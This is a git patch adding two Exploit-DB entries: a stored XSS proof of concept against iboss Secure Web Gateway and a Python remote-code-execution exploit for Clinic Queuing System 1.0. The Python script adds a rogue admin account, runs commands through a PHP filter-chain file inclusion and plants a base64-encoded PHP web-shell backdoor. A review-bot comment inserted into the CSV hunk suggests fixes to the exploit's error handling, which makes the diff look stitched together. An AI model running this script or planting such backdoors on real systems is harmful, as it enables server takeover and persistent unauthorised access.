From edacab1df2f0be276c1adbbeb4f716f0d0e9718c Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Thu, 9 May 2024 00:16:23 +0000
Subject: [PATCH] DB: 2024-05-09

3 changes to exploits/shellcodes/ghdb

iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
Clinic Queuing System 1.0 - RCE
---
 exploits/multiple/webapps/52009.txt | 43 +++++++++++++++++
 exploits/php/webapps/52008.py | 71 +++++++++++++++++++++++++++++
 files_exploits.csv | 2 +
 3 files changed, 116 insertions(+)
 create mode 100644 exploits/multiple/webapps/52009.txt
 create mode 100755 exploits/php/webapps/52008.py
diff --git a/exploits/multiple/webapps/52009.txt b/exploits/multiple/webapps/52009.txt
new file mode 100644
index 0000000000..9297ff4317
--- /dev/null
+++ b/exploits/multiple/webapps/52009.txt
@@ -0,0 +1,43 @@
+# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
+# Date: 4/4/2024
+# Exploit Author: modrnProph3t
+# Vendor Homepage: https://www.iboss.com
+# Version: < 10.2.0
+# CVE-2024-3378
+# Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md
+
+
+## Description
+A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload.
+
+This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included.
+
+## Proof of Conept
+1. Access the login portal located at /login
+
+
+2. Submit login attempt and intercept the request
+
+Example of unaltered request:
+```
+POST /user_login_submit HTTP/1.1
+Host:
+<--Headers Removed-->
+
+userName=TEST&x=TEST&action=login&redirectUrl=
+```
+
+
+3. Insert XSS payload into the "redirectUrl" parameter
+
+Example of request with inserted payload:
+```
+POST /user_login_submit HTTP/1.1
+Host:
+<--Headers Removed-->
+
+userName=TEST&x=TEST&action=login&redirectUrl=">
+```
+
+
+4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload execution
\ No newline at end of file
diff --git a/exploits/php/webapps/52008.py b/exploits/php/webapps/52008.py
new file mode 100755
index 0000000000..f452803c08
--- /dev/null
+++ b/exploits/php/webapps/52008.py
@@ -0,0 +1,71 @@
+# Exploit Title: Clinic Queuing System 1.0 RCE
+# Date: 2024/1/7
+# Exploit Author: Juan Marco Sanchez
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html
+# Version: 1.0
+# Tested on: Debian Linux Apache Web Server
+# CVE: CVE-2024-0264 and CVE-2024-0265
+
+import requests
+import random
+import argparse
+from bs4 import BeautifulSoup
+
+parser = argparse.ArgumentParser()
+parser.add_argument("target")
+args = parser.parse_args()
+
+base_url = args.target
+phase1_url = base_url + '/LoginRegistration.php?a=save_user'
+phase2_url = base_url + '/LoginRegistration.php?a=login'
+
+filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.ico
nv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|conver
t.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"
+
+def phase1(): # CVE-2024-0264
+ rand_user = 'pwn_'+str(random.randint(100, 313))
+ rand_pass = 'pwn_'+str(random.randint(100, 313))
+ pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}
+ print("[*] adding administrator " + rand_user + ":" + rand_pass)
+ phase1 = requests.post(phase1_url, pwn_user_data)
+ if "User Account has been added successfully." in phase1.text:
+ print("[+] Phase 1 Success - Admin user added!\n")
+ print("[*] Initiating Phase 2")
+ phase2(rand_user, rand_pass)
+ else:
+ print("[X] user creation failed :(")
+ die()
+
+def phase2(user, password): # CVE-2024-0265
+ s = requests.Session();
+ login_data = {'formToken':'','username':user, 'password':password}
+ print("[*] Loggin in....")
+ phase2 = s.post(phase2_url, login_data)
+
+ if "Login successfully." in phase2.text:
+ print("[+] Login success")
+ else:
+ print("[X] Login failed.")
+ die()
+
+ print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")
+ rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|
'.shell_exec('id').'
';"
+ #print("[*] Payload: " + rce_url)
+ rce = s.get(rce_url)
+
+ if "jmrcsnchz" in rce.text:
+ print("[+] RCE success!")
+ soup = BeautifulSoup(rce.text, 'html.parser')
+ print("[+] Output of id: " + soup.pre.get_text())
+ print("[*] Uploading php backdoor....")
+ s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")
+ print("[+] Access at " + base_url + "/rce.php?0=whoami")
+ else:
+ print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")
+ die()
+
+try:
+ print("[*] Initiating Phase 1")
+ phase1()
+except:
+ print("Exploit failed.")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5a6e81e8c5..2a9ea76a7d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
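Review bot: `die()` is called on every failure branch of phase1() and phase2() but is never defined or imported, so each of those branches raises NameError instead of exiting, and the bare `except:` around the phase1() call then swallows it (together with everything else, including KeyboardInterrupt) and prints only "Exploit failed.", losing the real cause. Replacing the three `die()` calls with `raise SystemExit(1)` and narrowing the top-level handler to `except Exception as e:` followed by `print("Exploit failed:", e)` keeps the failure reason visible and lets the exit propagate. The locals `phase1` and `phase2` also shadow the functions of the same name inside their own bodies; that is harmless as written but reads like a bug, and a name such as `resp` would be clearer. Note that in this rendering the filter_chain literal and the rce_url line are split across several lines, so the exact string content cannot be confirmed from the hunk as shown.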
@@ -11948,6 +11948,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple,,2009-04-14,2014-04-16,1,CVE-2009-1334;OSVDB-53651,,,,,https://www.securityfocus.com/bid/34513/info
 32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",webapps,multiple,,2008-11-10,2014-03-29,1,,,,,,https://www.securityfocus.com/bid/32233/info
 17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",webapps,multiple,,2011-06-15,2011-06-15,1,CVE-2010-3271;OSVDB-73052,,,,,http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories
+52009,exploits/multiple/webapps/52009.txt,"iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)",2024-05-08,modrnProph3t,webapps,multiple,,2024-05-08,2024-05-08,0,,,,,,
 49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
 10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,webapps,multiple,,2009-12-23,,1,,,,,,
 28854,exploits/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",webapps,multiple,,2013-10-10,2013-10-10,0,OSVDB-98372,,,,,
@@ -15888,6 +15889,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",2021-10-22,"Pablo Santiago",webapps,php,,2021-10-22,2021-11-29,0,,,,,,
 48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,,2020-06-04,2020-06-04,0,,,,,,
 46642,exploits/php/webapps/46642.txt,"Clinic Pro v4 - 'month' SQL Injection",2019-04-03,"Abdullah Çelebi",webapps,php,80,2019-04-03,2019-04-03,0,,"SQL Injection (SQLi)",,,,
+52008,exploits/php/webapps/52008.py,"Clinic Queuing System 1.0 - RCE",2024-05-08,"Juan Marco Sanchez",webapps,php,,2024-05-08,2024-05-08,0,,,,,,
 51779,exploits/php/webapps/51779.txt,"Clinic's Patient Management System 1.0 - Unauthenticated RCE",2024-02-05,"Oğulcan Hami Gül",webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 9255,exploits/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,webapps,php,,2009-07-23,,1,,,,,,
 12383,exploits/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,webapps,php,,2010-04-24,,1,,,,,,